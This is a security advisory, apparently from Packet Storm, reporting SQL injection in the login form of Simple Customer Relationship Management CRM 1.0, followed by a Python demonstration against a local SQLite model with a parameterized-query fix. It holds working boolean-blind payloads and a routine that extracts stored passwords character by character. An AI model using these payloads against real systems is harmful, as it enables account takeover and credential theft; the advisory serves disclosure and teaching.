Simple Customer Relationship Management CRM 2023 1.0 SQL Injection

Simple Customer Relationship Management CRM 2023 version 1.0 suffers from a remote SQL injection vulnerability.

Packet Storm
#sql#vulnerability#web#git#php#auth
## Title: SCRMS-2023-05-27-1.0-Multiple-SQLi
## Author: nu11secur1ty
## Date: 05.27.2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `email` parameter of the login form (POST) is vulnerable to SQL injection. The test payloads `45141002' or 6429=6429-- ` and `37491017' or 5206=5213-- ` were each submitted in the `email` parameter. The two requests produced different responses, which shows that the input is incorporated into a SQL query unsafely (spliced into the query text rather than bound as a parameter), so the database evaluates the injected condition. Because the injection sits in the login query, an attacker can use it to dump all users and their passwords and then log in to the system. Even if the stored passwords are hashed, cracking them only costs time, and it is no obstacle at all if the hashing is weak.

STATUS: HIGH Vulnerability

[+] Payload:

```text
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: email=-1544' OR 2326=2326-- eglC&password=c5K!k0k!T7&login=
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/SCRMS-2023-05-27-1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/05/scrms-2023-05-27-10-multiple-sqli.html)

## Time spent:
01:00:00
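As an added illustration (not part of the advisory and not the application's code), the following Python models the login-query pattern the advisory describes against an in-memory SQLite database standing in for MySQL, with constructed sample users. It replays the advisory's true/false probe pair against a concatenated query and against a parameterized one, and then shows the generalization the impact statement relies on: turning the boolean oracle into extraction of a stored password one character at a time. The table and column names (`users`, `email`, `password`) and the plaintext sample passwords are assumptions chosen to keep the example readable, not facts about the application.

```python
import sqlite3

# Constructed sample data, not from the application: an assumed users table
# with assumed column names and plaintext passwords so extraction is easy to follow.
SAMPLE_USERS = [("admin@example.com", "s3cret"), ("sales@example.com", "hunter2")]

# The two probes from the advisory's sqlmap output: one always-true and one
# always-false condition. "-- " comments out the rest of the query, including
# the password check; sqlmap appends a random token (eglC) after it.
TRUE_PAYLOAD = "-1544' OR 2326=2326-- eglC"
FALSE_PAYLOAD = "37491017' or 5206=5213-- "


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (email, password) VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, email, password):
    # The unsafe pattern: user input spliced straight into the SQL text.
    sql = ("SELECT id FROM users WHERE email = '" + email
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn, email, password):
    # The fix: bound parameters, so the payload is compared as a literal string.
    sql = "SELECT id FROM users WHERE email = ? AND password = ?"
    return conn.execute(sql, (email, password)).fetchall()


def boolean_blind_probe(login):
    # Replays the advisory's check: send the true and the false payload with a
    # junk password and count the rows each matches. A difference means the
    # database is evaluating the injected condition.
    conn = make_db()
    junk_password = "c5K!k0k!T7"
    true_rows = login(conn, TRUE_PAYLOAD, junk_password)
    false_rows = login(conn, FALSE_PAYLOAD, junk_password)
    return len(true_rows), len(false_rows)


def blind_extract_password(login, conn, max_len=16):
    # Turns the true/false oracle into data theft: guess the first stored
    # password one character at a time. substr() exists in both SQLite and
    # MySQL; ORDER BY ... LIMIT 1 keeps the subquery scalar.
    charset = "abcdefghijklmnopqrstuvwxyz0123456789"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            probe = ("x' OR (SELECT substr(password, %d, 1) FROM users "
                     "ORDER BY id LIMIT 1) = '%s'-- " % (pos, ch))
            if login(conn, probe, "irrelevant"):
                recovered += ch
                break
        else:
            break  # nothing matched: end of password (or a character outside charset)
    return recovered


if __name__ == "__main__":
    print("vulnerable (true_rows, false_rows):", boolean_blind_probe(login_vulnerable))
    print("parameterized (true_rows, false_rows):", boolean_blind_probe(login_parameterized))
    print("extracted from vulnerable login:", blind_extract_password(login_vulnerable, make_db()))
```

Against the concatenated query the true payload matches every user while the false one matches none, which is exactly the response difference the advisory reports; against the bound-parameter query both payloads match nothing, and the extraction loop recovers nothing. The trailing space after `--` matters on MySQL, which only treats `--` as a comment when whitespace follows it. In the application's PHP the equivalent fix is a prepared statement (mysqli or PDO) with the email and password bound as parameters instead of interpolated into the query string.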
